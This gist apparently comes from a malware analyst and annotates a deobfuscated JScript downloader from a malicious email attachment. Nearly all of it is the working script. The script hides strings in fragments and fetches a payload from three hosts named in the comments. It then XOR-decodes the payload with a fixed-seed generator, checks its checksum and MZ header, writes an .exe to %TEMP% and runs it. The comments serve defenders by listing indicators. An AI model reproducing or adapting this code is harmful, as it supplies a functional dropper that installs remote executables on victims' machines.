@hasherezade
Last active July 27, 2016 16:42
Deobfuscating malicious attachment
// String table (part 1) of an obfuscated Windows Script Host (JScript) downloader.
// Every method name, COM ProgID and path the script needs is cut into short
// fragments, each padded with a no-op `+ ""`, and re-joined only at the point of use
// (for example Ep + Nt -> "length"). The table is laid out in reverse order of use:
// fragments needed at the end of the script are declared first.
// The one-argument functions interleaved with the fragments (WPe2, Ep0, NUl, ...)
// return their argument unchanged, so wrapping a fragment in one of them has no
// runtime effect.
// Several fragments in this run (the first four, for instance) are not referenced
// anywhere else in the visible listing; the code below uses differently-split copies
// of the same words.
var Bv2 = "e" + "";
var Vt0 = "clos" + "";
var Dk7 = "oFile" + "";
var MBv3 = "SaveT" + "";
function WPe2(UUp2) {
return UUp2;
};
// ZCq4 + Zn2 + IGi -> "writeText" (joined in STn).
var IGi = "eText" + "";
var Zn2 = "it" + "";
var ZCq4 = "wr" + "";
// Read bottom-up the next run spells "open", "Charset", "type", "ADODB.Stream" and
// "CreateObject", but none of these particular names is referenced in the visible code.
var JCw8 = "n" + "";
var Fp0 = "ope" + "";
var Mp8 = "et" + "";
var JHb6 = "Chars" + "";
var It = "pe" + "";
var OXj = "ty" + "";
var VDt = "am" + "";
var ESy = "tre" + "";
var Jm0 = ".S" + "";
var QRc1 = "DB" + "";
var UDy7 = "ADO" + "";
var Em1 = "t" + "";
var CQs5 = "jec" + "";
var En = "Ob" + "";
var LPa9 = "te" + "";
var Vo0 = "Crea" + "";
// Fu7 -> "join"; Gm0 + Qo5 + Hc + Vq1 -> "fromCharCode" (both used in JSk).
var Fu7 = "join" + "";
function Ep0(Ks) {
return Ks;
};
var Vq1 = "e" + "";
var Hc = "arCod" + "";
var Qo5 = "Ch" + "";
var Gm0 = "from" + "";
var PSg = "gth" + "";
var KBx1 = "len" + "";
// Ie1 -> "push"; Fx + Zk + URe7 + SOc -> "charCodeAt" (both used in JGt5).
var Ie1 = "push" + "";
var SOc = "At" + "";
var URe7 = "de" + "";
var Zk = "Co" + "";
var Fx = "char" + "";
var Ap5 = "h" + "";
var LDx0 = "lengt" + "";
var Kz = "ose" + "";
var Cl = "cl" + "";
function NUl(Oq1) {
return Oq1;
};
// BJz3 + Uj -> "ReadText"; LGl + MCp5 + WVa1 + QSa + Wm7 -> "LoadFromFile" (used in Nh).
var Uj = "ext" + "";
var BJz3 = "ReadT" + "";
function QIi2(PIt) {
return PIt;
};
var Wm7 = "le" + "";
var QSa = "Fi" + "";
var WVa1 = "om" + "";
var MCp5 = "Fr" + "";
var LGl = "Load" + "";
var Cu1 = "open" + "";
// Ud + DLj + Lw5 -> "Charset" (set to "437" in Nh and STn).
var Lw5 = "set" + "";
var DLj = "ar" + "";
var Ud = "Ch" + "";
var Ne7 = "type" + "";
var PIx = "am" + "";
var XYp6 = "tre" + "";
var RWh8 = ".S" + "";
var Ve = "DB" + "";
var Fm = "ADO" + "";
var ZWj = "bject" + "";
var Ps0 = "teO" + "";
var AVj = "Crea" + "";
var Az40 = "th" + "";
var Xb = "leng" + "";
var ROi = "gth" + "";
var Zx = "len" + "";
// TJo + EYf -> "splice" (used in Zy).
var EYf = "ce" + "";
var TJo = "spli" + "";
var Of = "gth" + "";
var Fq = "len" + "";
var Py8 = "th" + "";
var IAi = "leng" + "";
var Ic = "h" + "";
var MAs3 = "lengt" + "";
var VLw = "th" + "";
var GRr = "ng" + "";
var Gm = "le" + "";
var Xj = "th" + "";
var Pf = "leng" + "";
var OFc0 = "eep" + "";
var UHt = "Sl" + "";
// VQv -> "Run"; RFp1 + NFc -> " 321", the argument appended to the command line of
// the dropped executable.
var NFc = "21" + "";
var RFp1 = " 3" + "";
var VQv = "Run" + "";
var Bw9 = "th" + "";
var NDt6 = "leng" + "";
var Bm6 = "ngth" + "";
var Np = "le" + "";
// Id -> "close"; ZLe2 + Sg + FAm -> "SaveToFile".
var Id = "close" + "";
var FAm = "e" + "";
var Sg = "oFil" + "";
var ZLe2 = "SaveT" + "";
function Sn0(Sq5) {
return Sq5;
};
// Il4 + Om7 -> "position"; KOn5 + Ck0 + Wh8 + AZd -> "ResponseBody"; KFl + DLb -> "write".
var Om7 = "tion" + "";
var Il4 = "posi" + "";
var AZd = "y" + "";
var Wh8 = "eBod" + "";
var Ck0 = "pons" + "";
var KOn5 = "Res" + "";
var DLb = "te" + "";
var KFl = "wri" + "";
function VBc(FXk1) {
return FXk1;
};
// Jl9 -> "type" (stream type property).
var Jl9 = "type" + "";
var EPy4 = "open" + "";
function IVt3(WEc) {
return WEc;
};
// DOf3 + SSp + XMl + NAm + Zo -> "ADODB.Stream", the COM object used for all file I/O.
var Zo = "m" + "";
var NAm = "ea" + "";
var XMl = ".Str" + "";
var SSp = "ODB" + "";
var DOf3 = "AD" + "";
var BJx7 = "t" + "";
var FJb5 = "ec" + "";
var Tt = "Obj" + "";
var Ob4 = "eate" + "";
var Mj = "Cr" + "";
var OEc2 = "Sleep" + "";
// Cp + CMj8 -> "send"; HTb -> "GET"; BMy -> "open"; Zj3 + Pp -> "Sleep".
var CMj8 = "nd" + "";
var Cp = "se" + "";
var Te = "h" + "";
var WMd = "lengt" + "";
var HTb = "GET" + "";
var BMy = "open" + "";
function We0(Wa4) {
return Wa4;
};
var Pp = "eep" + "";
var Zj3 = "Sl" + "";
var ZNj3 = "th" + "";
var IAd = "leng" + "";
var Gg0 = "ect" + "";
var Ck = "teObj" + "";
var TNt = "Crea" + "";
var RUi4 = "th" + "";
var Yu = "leng" + "";
// BVv2 + IDf + GKn7 + SSr -> "MSXML2.XMLHTTP" (second HTTP client candidate).
var SSr = "P" + "";
var GKn7 = "MLHTT" + "";
var IDf = "L2.X" + "";
var BVv2 = "MSXM" + "";
function Ia(RWl3) {
return RWl3;
};
// Mf5 + APf + Hp1 + BKw + XSa2 + Yi + NWt + Nj -> "WinHttp.WinHttpRequest.5.1"
// (first HTTP client candidate).
var Nj = ".1" + "";
var NWt = ".5" + "";
var Yi = "est" + "";
var XSa2 = "pRequ" + "";
var BKw = "Htt" + "";
var Hp1 = "Win" + "";
var APf = "Http." + "";
var Mf5 = "Win" + "";
// Pieces of the base64 alphabet; no join of these names is visible in the listing.
var SDf = "+/" + "";
var Ww0 = "89" + "";
var Ej1 = "4567" + "";
var AZq = "z0123" + "";
var Ym = "wxy" + "";
var Jq9 = "tuv" + "";
var Nh1 = "opqrs" + "";
var Yl = "mn" + "";
var Jl = "kl" + "";
var WJp = "fghij" + "";
var Er3 = "abcde" + "";
var Vo = "YZ" + "";
var XKm = "WX" + "";
var Is = "STUV" + "";
var VIp = "NOPQR" + "";
var Aa9 = "JKLM" + "";
var Iv9 = "HI" + "";
var Oo0 = "FG" + "";
var BEs0 = "ABCDE" + "";
// YWy + Td -> ".exe"; Hl + KFu5 + Ww -> "sioLzkk2X" (file name written under %TEMP%).
var Td = "xe" + "";
var YWy = ".e" + "";
var Ww = "X" + "";
var KFu5 = "Lzkk2" + "";
var Hl = "sio" + "";
function WAi1(Jj6) {
return Jj6;
};
// NMx8 + Ci6 + Oy -> "%TEMP%/"; Fe6 + BXr7 + GFf + Oq5 -> "WScript.Shell".
var Oy = "%/" + "";
var Ci6 = "MP" + "";
var NMx8 = "%TE" + "";
var Oq5 = "l" + "";
var GFf = "Shel" + "";
var BXr7 = "pt." + "";
var Fe6 = "WScri" + "";
function ZZq3(JKs) {
return JKs;
};
function LAm(FZi3) {
return FZi3;
};
function Oo(Rq3) {
return Rq3;
};
function Rg(NZw4) {
return NZw4;
};
function Ul(GUy) {
return GUy;
};
function TZu(KVk) {
return KVk;
};
// String table (part 2): the "CreateObject" method name and the fragments of the
// three download URLs collected in VVq. Functions in this run are identity wrappers
// (each returns its argument unchanged).
// Es + SMd9 + FTv4 + QAt4 -> "CreateObject".
var QAt4 = "ct" + "";
var FTv4 = "je" + "";
var SMd9 = "ateOb" + "";
var Es = "Cre" + "";
// Fragments of the third URL, hxxp://davisdoherty[.]co[.]nz/g0vi70, last piece first.
// (Uq3 has no visible reference; the join in VVq starts from Aq5 instead.)
var Dw = "0" + "";
var Az4 = "i7" + "";
function BEi(YUb) {
return YUb;
};
var Yf4 = "0v" + "";
var DNw = "z/g" + "";
var Zh = "n" + "";
var HUv = "o." + "";
var Jw = ".c" + "";
function WZg(SVi1) {
return SVi1;
};
var Dz3 = "erty" + "";
var LCg6 = "isdoh" + "";
function Ex5(Fa1) {
return Fa1;
};
var UEo6 = "dav" + "";
function DOo6(PZs3) {
return PZs3;
};
var FRt = "/" + "";
var Fl = "tp:/" + "";
var Uq3 = "ht" + "";
function FWe(Qz1) {
return Qz1;
};
// Fragments of the second URL, hxxp://aquatixbottle[.]com/ygyngc, last piece first.
var MAp7 = "gc" + "";
var Iq = "gyn" + "";
var KKd1 = "y" + "";
var Uc = "m/" + "";
var PUd4 = "co" + "";
var AFi = "tle." + "";
var Nr9 = "bot" + "";
var COk = "ix" + "";
var VSn = "at" + "";
function YJi0(RZl8) {
return RZl8;
};
var Nv = "qu" + "";
var Jx1 = "/a" + "";
var Rl5 = ":/" + "";
var Tx0 = "http" + "";
// Fragments of the first URL, hxxp://BenavidezHoy[.]com/8zrg48k, last piece first.
var Bk5 = "8k" + "";
function WCm1(ZCp) {
return ZCp;
};
var Tx = "4" + "";
var CUp = "zrg" + "";
var Kn2 = "8" + "";
var Fw3 = "m/" + "";
var JBk4 = "o" + "";
var HDq = "oy.c" + "";
var Vt = "ezH" + "";
var Aa = "avid" + "";
var Cz = "n" + "";
var XTe8 = "//Be" + "";
var OMp7 = "tp:" + "";
var Aq5 = "ht" + "";
// "437" / "length" pieces with no visible reference; the code page actually used is
// the literal assigned to WKs8.
var CVc = "437" + "";
var Sv = "gth" + "";
var Uy2 = "len" + "";
function LQo5(ZKy) {
return ZKy;
};
// Filler strings and the numeric constants derived from them.
// The runs of "d" (plus "as"/"fa"/"sdf"/"fd") carry no text of their own: the only
// visible use is to concatenate them and read the resulting .length, which hides
// small integers behind string arithmetic. Functions in this run are identity
// wrappers (each returns its argument unchanged).
var EPd2 = "ddddd" + "";
var Yk = "dd" + "";
var XGu4 = "dd" + "";
var Pk = "ddddd" + "";
var JDx0 = "ddddd" + "";
var Ov0 = "ddd" + "";
var Vz5 = "dddd" + "";
var KCe = "ddddd" + "";
var HXr1 = "dddd" + "";
var Ed5 = "dddd" + "";
var Pr9 = "dddd" + "";
var Nt0 = "ddddd" + "";
var GJk2 = "ddddd" + "";
var Ml8 = "ddd" + "";
var Kp7 = "fd" + "";
var Vc3 = "as" + "";
var DMg8 = "sdf" + "";
var Cq4 = "fa" + "";
var Hn1 = "as" + "";
var Xp9 = "h" + "";
var Wz5 = "ngt" + "";
var UYv6 = "le" + "";
function Ln7(Rk6) {
return Rk6;
};
function Fj(Fu4) {
return Fu4;
};
function Ie(FKn2) {
return FKn2;
};
function Bm(GRl8) {
return GRl8;
};
function Xu(Jm) {
return Jm;
};
var ZOp9 = "d" + "";
var FPy5 = "dddd" + "";
var Jc9 = "ddd" + "";
var Eq = "ddddd" + "";
var Sk6 = "ddd" + "";
var BHv = "ddd" + "";
var Xf2 = "dddd" + "";
var RKt8 = "dd" + "";
var Qj7 = "dddd" + "";
var ABv = "ddd" + "";
var Sm9 = "dd" + "";
var Mh = "ddddd" + "";
var Ha0 = "dd" + "";
var Xa0 = "ddd" + "";
var Pr3 = "dd" + "";
var ZPa = "dddd" + "";
var Tj = "dddd" + "";
var Qu4 = "ddd" + "";
var Gs = "ddddd" + "";
function Mn0(Lr1) {
return Lr1;
};
function YBi9(Gl5) {
return Gl5;
};
function DXa5(Yg6) {
return Yg6;
};
// Ep + Nt -> "length": the property key used throughout the script in place of .length.
var Nt = "th" + "";
var Ep = "leng" + "";
function UAc1(KXm5) {
return KXm5;
};
function FWp(HCt5) {
return HCt5;
};
var Cf7 = "ddd" + "";
var QRu9 = "dd" + "";
var Xa = "ddddd" + "";
var WNv = "dddd" + "";
var YGy5 = "dddd" + "";
var Sv9 = "dddd" + "";
var Pm8 = "dd" + "";
var MHw7 = "dd" + "";
var Dd = "dd" + "";
var Wn = "dd" + "";
var Nn0 = "ddddd" + "";
var Nx0 = "dd" + "";
var JSj7 = "dddd" + "";
var Kz6 = "dddd" + "";
function QSh9(DJw) {
return DJw;
};
var MBm7 = "23132" + "";
var Co2 = "11" + "";
// Comma operator: the left operand ("11" + "23132") is evaluated and discarded, so
// Pv6 is only the right-hand string of 45 "d" characters.
var Pv6 = (QSh9(Co2) + MBm7, Kz6 + JSj7 + Nx0 + Nn0 + Wn + Dd + MHw7 + Pm8 + Sv9 + UAc1(YGy5) + WNv + Xa + QRu9 + FWp(Cf7));
// Jb = Pv6["length"] = 45; Zy uses it as the starting value of the payload checksum.
var Jb = Pv6[(function FSa7() {
return Ep;
}()) + Nt];
// Nv5 is 62 "d" characters, so QTh = 62. No reference to QTh is visible in the listing.
var Nv5 = (Gs + Ln7(Qu4) + Tj + ZPa + Pr3 + Xa0 + Fj(Ha0) + Mh + Sm9 + (function DRp3() {
return ABv;
}()) + Qj7 + RKt8 + Ie(Xf2) + (function Rm() {
return BHv;
}()) + Sk6 + Eq + Bm(Jc9) + FPy5 + Xu(ZOp9));
// Mi is the fixed seed hashed into the generator state in uheprng(); because it is a
// constant, the XOR keystream applied in Zy is the same on every run.
var Mi = 0.349591;
var QTh = Nv5[(function JFo() {
return Ep;
}()) + Nt];
// Same comma trick: "asfasdfasfd" is discarded and JUs is 56 "d" characters, so
// Nk = 56. No reference to Nk is visible in the listing.
var JUs = (Hn1 + Cq4 + DMg8 + (function Ps() {
return Vc3;
}()) + Kp7, Ml8 + GJk2 + Nt0 + LQo5(Pr9) + Ed5 + HXr1 + KCe + (function AAe6() {
return Vz5;
}()) + Ov0 + JDx0 + Pk + (function Gx() {
return XGu4;
}()) + Yk + EPd2);
var Nk = JUs[Ep + Nt];
// ADODB.Stream constants: BFz = 1 is assigned to .type for the raw download
// (adTypeBinary), Sq = 2 to .type in Nh/STn (adTypeText), Kn5 = 2 is the SaveToFile
// option (adSaveCreateOverWrite).
var BFz = 1;
var Sq = 2;
var Kn5 = 2;
// Charset assigned to the text streams in Nh and STn: code page 437.
var WKs8 = "437";
// VVq: the list of payload download locations, assembled from the fragment table.
// Once joined, the three entries are (defanged):
//   hxxp://BenavidezHoy[.]com/8zrg48k
//   hxxp://aquatixbottle[.]com/ygyngc
//   hxxp://davisdoherty[.]co[.]nz/g0vi70
// The inline function expressions and the identity helpers (WCm1, YJi0, FWe, ...)
// only return a fragment unchanged. These hosts and paths are the network indicators
// of this sample.
var VVq = [Aq5 + OMp7 + (function Pe() {
return XTe8;
}()) + Cz + Aa + Vt + HDq + JBk4 + Fw3 + (function UZh() {
return Kn2;
}()) + (function DZe() {
return CUp;
}()) + WCm1(Tx) + Bk5, Tx0 + (function Zq() {
return Rl5;
}()) + (function GOv() {
return Jx1;
}()) + YJi0(Nv) + VSn + COk + Nr9 + (function Ur2() {
return AFi;
}()) + PUd4 + Uc + (function Ci() {
return KKd1;
}()) + (function PJm6() {
return Iq;
}()) + FWe(MAp7), Aq5 + DOo6(Fl) + (function GYg2() {
return FRt;
}()) + Ex5(UEo6) + LCg6 + WZg(Dz3) + Jw + HUv + Zh + BEi(DNw) + (function YVj() {
return Yf4;
}()) + Az4 + Dw];
// Sn = WScript["CreateObject"]("WScript.Shell"): used below to expand environment
// variables and, at the end of the main loop, to Run the dropped file.
var Sn = WScript[(function XGd4() {
return Es;
}()) + (function HPf8() {
return SMd9;
}()) + ZZq3(FTv4) + LAm(QAt4)](Fe6 + BXr7 + GFf + (function Sy9() {
return Oq5;
}()));
// Hm4 = expansion of "%TEMP%/".
var Hm4 = Sn.ExpandEnvironmentStrings(NMx8 + WAi1(Ci6) + Oy);
// DJt9 = "<TEMP>/sioLzkk2X": where the raw (still encrypted) download is saved.
var DJt9 = Hm4 + Hl + KFu5 + Ww;
// Vh9 = "<TEMP>/sioLzkk2X.exe": where the decoded executable is written and run from.
// Both file names are host indicators of this sample.
var Vh9 = DJt9 + YWy + Td;
// Builds and returns the keystream generator used by Zy to decode the download.
// Returns a function random(range) that yields floor(range * x), x being the next
// pseudo-random fraction. The only seed material is the constant Mi, so the
// sequence is identical on every run and on every machine.
// NOTE(review): the name, the 48-word state, the Mash() seeding and the constants
// match the publicly available "uheprng" generator with its entropy collection
// removed - confirm against that source before relying on it.
function uheprng() {
return (function() {
// o: number of state words, c: carry, p: index of the current state word.
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
// Declared but not read anywhere in this function.
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
// Mash keeps its hash state between calls, so hashing the same seed 48 times
// still fills s[] with 48 different fractions.
for (i = 0; i < o; i++) s[i] = mash(Mi);
mash = null;
var random = function(range) {
// Two raw draws are combined into one fraction; 1.1102230246251565e-16 is 2^-53.
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {
// Advance cyclically through the state array.
if (++p >= o) p = 0;
// Multiply-with-carry step; 2.3283064365386963e-10 is 2^-32.
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
// (1 * 0) is 0, so c becomes the integer part of t (t | 0) and the fractional
// part is stored back into the state and returned.
return s[p] = t - (c = t | (1 * 0));
}
return random;
}());
};
// Creates a stateful string hash. The returned function folds the characters of
// data.toString() into a running 32-bit state and returns that state scaled into
// [0, 1). Calling it with a falsy argument resets the state and returns undefined.
// uheprng() uses it to turn the constant seed into its initial state words.
function Mash() {
  var INITIAL_STATE = 0xefc8249d;
  var state = INITIAL_STATE;

  return function(data) {
    if (!data) {
      // Falsy input (undefined, 0, "") means "reset", not "hash".
      state = INITIAL_STATE;
      return;
    }
    var text = data.toString();
    var pos = 0;
    while (pos < text.length) {
      state += text.charCodeAt(pos);
      var mix = 0.02519603282416938 * state;
      state = mix >>> 0;
      mix -= state;
      mix *= state;
      state = mix >>> 0;
      mix -= state;
      state += mix * 0x100000000; // 2^32
      pos++;
    }
    // 2.3283064365386963e-10 is 2^-32: scale the 32-bit state into [0, 1).
    return (state >>> 0) * 2.3283064365386963e-10;
  };
}
// HTTP client selection. SWh3 holds two COM ProgIDs, tried in this order:
//   "WinHttp.WinHttpRequest.5.1", then "MSXML2.XMLHTTP".
var SWh3 = [Mf5 + (function AYd() {
return APf;
}()) + Hp1 + BKw + XSa2 + Ia(Yi) + NWt + Nj, BVv2 + (function Ai7() {
return IDf;
}()) + GKn7 + (function Jn3() {
return SSr;
}())];
// Es + SMd9 + FTv4 + QAt4 -> "CreateObject". The first ProgID that instantiates
// without throwing is kept in Yr2; a failure just moves on to the next one. If both
// fail, Yr2 stays undefined and every pass of the main loop lands in its catch block.
for (var KFh4 = 0; KFh4 < SWh3[(function HMo2() {
return Ep;
}()) + Nt]; KFh4++) {
try {
var Yr2 = WScript[Es + SMd9 + FTv4 + (function MOv() {
return QAt4;
}())](SWh3[KFh4]);
break;
} catch (e) {
continue;
}
};
// Main download-decode-execute loop.
// ORj1 is the "issue a request" flag (-1849 + 1850 = 1; the visible code never sets
// it to anything else) and Vc6 is the running index into the URL list VVq
// (2477 - 2477 = 0). Nh, Zy, ZZr and STn are function declarations placed after
// this loop; they are hoisted, so calling them here works.
// Behaviour visible to a defender: the script host sends plain HTTP GETs to the VVq
// hosts, writes "<TEMP>/sioLzkk2X", then "<TEMP>/sioLzkk2X.exe", and starts the
// latter with the argument "321".
var ORj1 = -1849 + 1850;
var Vc6 = 2477 - 2477;
do {
try {
if (1 == ORj1) {
// After a full pass over the URL list, wait 1000 ms before starting over.
if (Vc6 >= VVq[Ep + Nt]) {
Vc6 = 0;
WScript[Zj3 + We0(Pp)](1000);
}
// Yr2["open"]("GET", <next URL>, false) - the third argument makes the request
// synchronous - followed by Yr2["send"]().
Yr2[BMy](HTB = HTb, VVq[Vc6++ % VVq[Ep + (function VSc8() {
return Nt;
}())]], false);
Yr2[Cp + CMj8]();
}
// Poll every 100 ms until the request reports state 4 (complete).
if (Yr2.readystate < 4) {
WScript[Zj3 + Pp](100);
continue;
}
// Dump the raw response to disk: ADODB.Stream, type 1 (binary), write
// ResponseBody, rewind, SaveToFile(DJt9, 2 = overwrite), close.
var IUh = WScript[Es + Oo(SMd9) + FTv4 + QAt4](DOf3 + SSp + XMl + IVt3(NAm) + Zo);
IUh[BMy]();
IUh[Jl9] = BFz;
IUh[(function Ir6() {
return KFl;
}()) + DLb](Yr2[KOn5 + Ck0 + Wh8 + AZd]);
IUh[Sn0(Il4) + Om7] = 0;
IUh[ZLe2 + Sg + FAm](DJt9, Kn5);
IUh[Id]();
// Read the file back as an array of byte values, then decode and checksum it.
var GHq4 = Nh(DJt9);
GHq4 = Zy(GHq4);
// Accept the result only if it is between 100 KiB and 230 KiB and starts with
// "MZ"; otherwise move on to the next URL. A failed checksum makes Zy return [],
// which is rejected here by the size test.
if (GHq4[Mn0(Ep) + (function NUa() {
return Nt;
}())] < 100 * 1024 || GHq4[(function WGk0() {
return Ep;
}()) + Nt] > 230 * 1024 || !ZZr(GHq4)) {
ORj1 = 1;
continue;
}
// Write the decoded bytes to Vh9 (the ".exe" path); give up if that fails.
try {
STn(Vh9 /* b */ , GHq4);
} catch (e) {
break;
};
// Sn["Run"](Vh9 + " 321"): start the dropped executable through WScript.Shell.
Sn[VQv](Vh9 /* b */ + (function Du() {
return RFp1;
}()) + NFc);
break;
} catch (e) {
// Any other failure (network error, COM error): wait 167 * 5 + 165 = 1000 ms and
// retry with the next URL.
WScript[Zj3 + Pp](167 * 5 + 165);
continue;
};
} while (ORj1);
WScript.Quit(0);
// Decodes the downloaded byte array in place and verifies its trailing checksum.
// WPx8: array of byte values as produced by Nh.
// Returns the decoded array without its 4-byte trailer, or [] when the checksum
// does not match.
function Zy(WPx8) {
var NKh;
// Fresh generator on every call, so the keystream always starts from the same state.
var Je = uheprng();
// XOR every element with Je(256) (121 * 2 + 14 = 256), presumably a value in 0..255.
for (var KFh4 = 0; KFh4 < WPx8[Ep + Nt]; KFh4++) {
WPx8[KFh4] ^= Je(121 * 2 + 14);
}
// The last four decoded bytes, read little-endian, are the expected checksum
// (9331 - 9323 = 8).
var Rm5 = WPx8[WPx8[Ep + Nt] - 4] | WPx8[WPx8[(function AMo() {
return Ep;
}()) + YBi9(Nt)] - 3] << (9331 - 9323) | WPx8[WPx8[Ep + Nt] - 2] << 16 | WPx8[WPx8[Ep + Nt] - 1] << 24;
// splice(length - 4, 4) removes that trailer. The length is read from the global
// GHq4 rather than from the parameter; in the only visible call site they are the
// same array.
WPx8[TJo + EYf](GHq4[(function Wn0() {
return Ep;
}()) + Nt] - 4, 2 * 2);
// Additive checksum modulo 2^32, starting from Jb.
NKh = Jb;
for (var KFh4 = 0; KFh4 < WPx8[Ep + Nt]; KFh4++) {
NKh = (NKh + WPx8[KFh4]) % 0x100000000;
};
if (NKh != Rm5) {
return [];
};
return WPx8;
};
// Reports whether the byte array starts with 0x4D 0x5A ("MZ"), the magic of a
// DOS/PE executable. The main loop uses this to reject anything that did not decode
// to an executable image.
function ZZr(WPx8) {
  var startsWithM = WPx8[0] == 0x4D;
  var thenZ = WPx8[1] == 0x5a;
  return startsWithM && thenZ;
}
// Reads the file at path Vd1 and returns its content as an array of byte values.
// The script has no direct binary read, so it loads the file through a text-mode
// ADODB.Stream with Charset "437" (every byte becomes one character) and lets
// JGt5 map the characters back to byte values.
function Nh(Vd1) {
// WScript["CreateObject"]("ADODB.Stream")
var Jf8 = WScript[Rg(Es) + SMd9 + Ul(FTv4) + QAt4](DOf3 + SSp + XMl + NAm + Zo);
// type = 2 (text), Charset = "437", then open().
Jf8[Jl9] = Sq;
Jf8[Ud + DLj + Lw5] = WKs8;
Jf8[BMy]();
// LoadFromFile(Vd1)
Jf8[QIi2(LGl) + MCp5 + WVa1 + QSa + (function Vi4() {
return Wm7;
}())](Vd1);
// ReadText is read as a property, i.e. the whole stream content as one string.
var WMj5 = Jf8[BJz3 + NUl(Uj)];
// close()
Jf8[(function Ms() {
return Id;
}())]();
return JGt5(WMj5);
};
// Converts a string read through a code page 437 text stream back into byte values.
// DLq8: string whose characters each stand for one original byte.
// Returns an array with one number per character: char codes below 128 are kept,
// anything else is looked up in TNv.
function JGt5(DLq8) {
// TNv: Unicode code point -> code page 437 byte value for the upper half
// (0x80..0xFF). It is the inverse of the table in JSk.
var TNv = new Array();
TNv[0xC7] = 0x80;
TNv[0xFC] = 0x81;
TNv[0xE9] = 0x82;
TNv[0xE2] = 0x83;
TNv[0xE4] = 0x84;
TNv[0xE0] = 0x85;
TNv[0xE5] = 0x86;
TNv[0xE7] = 0x87;
TNv[0xEA] = 0x88;
TNv[0xEB] = 0x89;
TNv[0xE8] = 0x8A;
TNv[0xEF] = 0x8B;
TNv[0xEE] = 0x8C;
TNv[0xEC] = 0x8D;
TNv[0xC4] = 0x8E;
TNv[0xC5] = 0x8F;
TNv[0xC9] = 0x90;
TNv[0xE6] = 0x91;
TNv[0xC6] = 0x92;
TNv[0xF4] = 0x93;
TNv[0xF6] = 0x94;
TNv[0xF2] = 0x95;
TNv[0xFB] = 0x96;
TNv[0xF9] = 0x97;
TNv[0xFF] = 0x98;
TNv[0xD6] = 0x99;
TNv[0xDC] = 0x9A;
TNv[0xA2] = 0x9B;
TNv[0xA3] = 0x9C;
TNv[0xA5] = 0x9D;
TNv[0x20A7] = 0x9E;
TNv[0x192] = 0x9F;
TNv[0xE1] = 0xA0;
TNv[0xED] = 0xA1;
TNv[0xF3] = 0xA2;
TNv[0xFA] = 0xA3;
TNv[0xF1] = 0xA4;
TNv[0xD1] = 0xA5;
TNv[0xAA] = 0xA6;
TNv[0xBA] = 0xA7;
TNv[0xBF] = 0xA8;
TNv[0x2310] = 0xA9;
TNv[0xAC] = 0xAA;
TNv[0xBD] = 0xAB;
TNv[0xBC] = 0xAC;
TNv[0xA1] = 0xAD;
TNv[0xAB] = 0xAE;
TNv[0xBB] = 0xAF;
TNv[0x2591] = 0xB0;
TNv[0x2592] = 0xB1;
TNv[0x2593] = 0xB2;
TNv[0x2502] = 0xB3;
TNv[0x2524] = 0xB4;
TNv[0x2561] = 0xB5;
TNv[0x2562] = 0xB6;
TNv[0x2556] = 0xB7;
TNv[0x2555] = 0xB8;
TNv[0x2563] = 0xB9;
TNv[0x2551] = 0xBA;
TNv[0x2557] = 0xBB;
TNv[0x255D] = 0xBC;
TNv[0x255C] = 0xBD;
TNv[0x255B] = 0xBE;
TNv[0x2510] = 0xBF;
TNv[0x2514] = 0xC0;
TNv[0x2534] = 0xC1;
TNv[0x252C] = 0xC2;
TNv[0x251C] = 0xC3;
TNv[0x2500] = 0xC4;
TNv[0x253C] = 0xC5;
TNv[0x255E] = 0xC6;
TNv[0x255F] = 0xC7;
TNv[0x255A] = 0xC8;
TNv[0x2554] = 0xC9;
TNv[0x2569] = 0xCA;
TNv[0x2566] = 0xCB;
TNv[0x2560] = 0xCC;
TNv[0x2550] = 0xCD;
TNv[0x256C] = 0xCE;
TNv[0x2567] = 0xCF;
TNv[0x2568] = 0xD0;
TNv[0x2564] = 0xD1;
TNv[0x2565] = 0xD2;
TNv[0x2559] = 0xD3;
TNv[0x2558] = 0xD4;
TNv[0x2552] = 0xD5;
TNv[0x2553] = 0xD6;
TNv[0x256B] = 0xD7;
TNv[0x256A] = 0xD8;
TNv[0x2518] = 0xD9;
TNv[0x250C] = 0xDA;
TNv[0x2588] = 0xDB;
TNv[0x2584] = 0xDC;
TNv[0x258C] = 0xDD;
TNv[0x2590] = 0xDE;
TNv[0x2580] = 0xDF;
TNv[0x3B1] = 0xE0;
TNv[0xDF] = 0xE1;
TNv[0x393] = 0xE2;
TNv[0x3C0] = 0xE3;
TNv[0x3A3] = 0xE4;
TNv[0x3C3] = 0xE5;
TNv[0xB5] = 0xE6;
TNv[0x3C4] = 0xE7;
TNv[0x3A6] = 0xE8;
TNv[0x398] = 0xE9;
TNv[0x3A9] = 0xEA;
TNv[0x3B4] = 0xEB;
TNv[0x221E] = 0xEC;
TNv[0x3C6] = 0xED;
TNv[0x3B5] = 0xEE;
TNv[0x2229] = 0xEF;
TNv[0x2261] = 0xF0;
TNv[0xB1] = 0xF1;
TNv[0x2265] = 0xF2;
TNv[0x2264] = 0xF3;
TNv[0x2320] = 0xF4;
TNv[0x2321] = 0xF5;
TNv[0xF7] = 0xF6;
TNv[0x2248] = 0xF7;
TNv[0xB0] = 0xF8;
TNv[0x2219] = 0xF9;
TNv[0xB7] = 0xFA;
TNv[0x221A] = 0xFB;
TNv[0x207F] = 0xFC;
TNv[0xB2] = 0xFD;
TNv[0x25A0] = 0xFE;
TNv[0xA0] = 0xFF;
var GHq4 = new Array();
for (var KFh4 = 0; KFh4 < DLq8[Ep + Nt]; KFh4++) {
// Ha = DLq8["charCodeAt"](KFh4)
var Ha = DLq8[Fx + Zk + (function Mp2() {
return URe7;
}()) + SOc](KFh4);
// 36 * 3 + 20 = 128: the lower half of the code page maps to itself.
if (Ha < (36 * 3 + 20)) {
var OTl4 = Ha;
} else {
// A code point missing from TNv yields undefined here.
var OTl4 = TNv[Ha];
}
// GHq4["push"](OTl4)
GHq4[(function Mv() {
return Ie1;
}())](OTl4);
};
return GHq4;
};
// Converts an array of byte values into a string that, written through a code page
// 437 text stream, reproduces those bytes on disk.
// WPx8: array of numbers (byte values).
// Returns one character per element: values below 128 are used as the char code
// directly, anything else is looked up in Vd.
function JSk(WPx8) {
// Vd: code page 437 byte value (0x80..0xFF) -> Unicode code point. It is the
// inverse of the table in JGt5.
var Vd = new Array();
Vd[0x80] = 0x00C7;
Vd[0x81] = 0x00FC;
